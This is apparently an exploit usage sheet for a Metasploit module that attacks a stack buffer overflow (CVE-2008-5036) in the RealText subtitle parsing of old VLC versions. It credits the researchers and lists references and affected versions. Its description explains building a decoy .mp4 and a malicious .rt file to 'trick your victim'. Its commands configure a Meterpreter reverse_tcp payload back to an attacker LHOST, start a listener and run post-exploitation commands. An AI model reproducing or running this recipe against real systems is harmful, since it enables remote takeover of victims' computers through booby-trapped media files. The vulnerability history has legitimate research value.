Timeline :

Vulnerability found by Tobias Klein
Vulnerability reported to the vendor by Tobias Klein the 2008-11-03
Coordinated public release of the vulnerability the 2008-11-05
Metasploit PoC provided the 2012-03-01

PoC provided by :

Tobias Klein
SkD
juan vazquez

Reference(s) :

CVE-2008-5036
OSVDB-49809
VideoLAN-SA-0810
TKADV2008-011

Affected version(s) :

VLC media player 0.9.5 down to 0.5.0

Tested on Windows XP Pro SP3 with :

VLC 0.9.4

Description :

This module exploits a stack buffer overflow vulnerability in VideoLAN VLC before 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.

Commands :

use exploit/windows/fileformat/vlc_realtext
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid